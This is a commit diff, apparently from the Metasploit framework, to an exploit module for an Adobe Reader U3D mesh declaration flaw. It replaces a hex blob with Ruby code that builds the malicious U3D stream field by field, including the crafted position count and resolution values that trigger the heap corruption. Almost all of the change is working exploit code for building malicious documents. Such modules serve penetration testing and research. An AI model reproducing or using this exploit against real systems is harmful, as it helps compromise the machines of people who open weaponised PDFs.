broke up u3d data a bit, first pass

git-svn-id: file:///home/svn/framework3/trunk@7619 4d416f70-5f16-0410-b530-b9f4589650da
2009-11-26 00:34:22 +00:00 · 2009-11-26 00:34:22 +00:00 · dd713f96de
parent 723aa65df0
commit dd713f96de
1 changed files with 124 additions and 12 deletions
--- a/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb
+++ b/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb
@ -288,21 +288,133 @@ Original notes on heap technique used in this exploit:
 		result << ">"
 	end
 	
+	def u3d_pad(str, char)
+		ret = ""
+		if (str.length % 4)
+			ret << char * (4 - (str.length % 4))
+		end
+		return ret
+	end
+	
+	
 	def make_u3d_stream(size)
 		
-		data = ""
-		data << "55334400180000000000000000010000000000002400000064010000000000006a00000014"
-		data << "ffffffe40000000000000007005468654d65736801000000000000005050500100000031ff"
-		data << "ffff710000004b00000007005468654d657368000000000000000001000000595858580400"
-		data << "0000000000000000000000000000010000000000000000000000000000005b5858585c5858"
-		data << "582c0100002c0100002c010000000000000000000000000000000000000000000000000000"        
-		data << "000000000000000000000000505050010000000600617574686f7201000000370000004665"
-		data << "6c69706520416e64726573204d616e7a616e6f203c66656c6970652e616e647265732e6d61"
-		data << "6e7a616e6f40676d61696c2e636f6d3e503cffffff410000000000000007005468654d6573"
-		data << "68000000000000000000000000000000000100000001000000010000000100000001000000"
-		data << "0100000001000000010000000100000001000000505050"
+		mesh_name = "TheMesh"
 		
-		data = [data].pack('H*')
+		# build the U3D header
+		hdr_data = "\x00\x01\x00\x00" # version info (wtf?)
+		hdr_data << [0,0x24,0x164,0,0x6a].pack('VVVVV')
+		hdr = [0x00443355,hdr_data.length,0].pack('VVV')
+		hdr << hdr_data
+		
+		# mesh declaration
+		md_data = [mesh_name.length].pack('v')
+		md_data << mesh_name
+		md_data << [0].pack('V') # chain idx
+		# max mesh desc
+		md_data << [0].pack('V') # mesh attrs
+		md_data << [1].pack('V') # face count
+		md_data << [0x58585859].pack('V') # position count
+		md_data << [4].pack('V') # normal count
+		md_data << [0].pack('V') # diffuse color count
+		md_data << [0].pack('V') # specular color count
+		md_data << [0].pack('V') # texture coord count
+		md_data << [1].pack('V') # shading count
+		# shading desc
+		md_data << [0].pack('V') # shading attr
+		md_data << [0].pack('V') # texture layer count
+		md_data << [0].pack('V') # texture coord dimensions
+		# no textore coords (original shading ids)
+		md_data << [0x5858585b].pack('V') # minimum resolution
+		md_data << [0x5858585c].pack('V') # final maximum resolution
+		# quality factors
+		md_data << [0x12c].pack('V') # position quality factor
+		md_data << [0x12c].pack('V') # normal quality factor
+		md_data << [0x12c].pack('V') # texture coord quality factor
+		# inverse quantiziation
+		md_data << [0].pack('V') # position inverse quant
+		md_data << [0].pack('V') # normal inverse quant
+		md_data << [0].pack('V') # texture coord inverse quant
+		md_data << [0].pack('V') # diffuse color inverse quant
+		md_data << [0].pack('V') # specular color inverse quant
+		# resource params
+		md_data << [0].pack('V') # normal crease param
+		md_data << [0].pack('V') # normal update param
+		md_data << [0].pack('V') # normal tolerance param
+		# skeleton description
+		md_data << [0].pack('V') # bone count
+		# padding
+		md_pad = u3d_pad(md_data, "\x50")
+		
+=begin
+
+take meta data out !
+
+		# meta data
+		md_meta = [1].pack('V') # type - binary sequence
+		key = 'author'
+		md_meta << [key.length].pack('v')
+		md_meta << key
+		md_meta << [1].pack('V') # type - binary sequence
+		str = "Felipe Andres Manzano <felipe.andres.manzano@gmail.com>"
+		md_meta << [str.length].pack('V') # ? 32-bit??
+		md_meta << str
+		md_pad2 = u3d_pad(md_meta, "\x50")
+=end
+		md_meta = ""
+		md_pad2 = ""
+	  
+		mesh_decl = [0xffffff31,md_data.length,md_meta.length].pack('VVV')
+		mesh_decl << md_data
+		mesh_decl << md_pad
+		mesh_decl << md_meta
+		mesh_decl << md_pad2
+		
+		# mesh continuation
+		cont_data = [mesh_name.length].pack('v')
+		cont_data << mesh_name
+		cont_data << [0].pack('V') # chain idx
+		cont_data << [0].pack('V') # start resolution
+		cont_data << [0].pack('V') # end resolution 
+		cont_data << [0].pack('V') # split position index
+		# new diffuse color info
+		cont_data << [1].pack('v') # count
+		cont_data << "\x00" # difference sign
+		cont_data << "\x00" # pad
+		cont_data << [1].pack('V') 
+		cont_data << [1].pack('V') 
+		cont_data << [1].pack('V')
+		cont_data << [1].pack('V')
+		# new specular color info
+		cont_data << [1].pack('v') # count
+		cont_data << "\x00" # sign
+		cont_data << "\x00" # pad
+		cont_data << [1].pack('V')
+		cont_data << [1].pack('V')
+		cont_data << [1].pack('V')
+		cont_data << [1].pack('V')
+		# new texture coord info
+		mesh_cont = [0xffffff3c,cont_data.length,0].pack('VVV')
+		mesh_cont << cont_data
+		mesh_cont << u3d_pad(cont_data, "\x50")
+		
+		# build the modifier chain
+		chain_data = [mesh_name.length].pack('v')
+		chain_data << mesh_name
+		chain_data << [1].pack('V') # type (model resource)
+		chain_data << [0].pack('V') # attributes (no bounding info)
+		chain_data << u3d_pad(chain_data, "\x50")
+		chain_data << [1].pack('V') # ??
+		chain_data << mesh_decl
+		modifier_chain = [0xffffff14,chain_data.length,0].pack('VVV')
+		modifier_chain << chain_data
+				
+		data = hdr
+		data << modifier_chain
+		data << mesh_cont
+		
+		# patch the length
+		#data[28,4] = [data.length].pack('V')
 		
 		# 9.6.1.1.3.3 U32: Position Count
 		addr = [0x58585859].pack('V')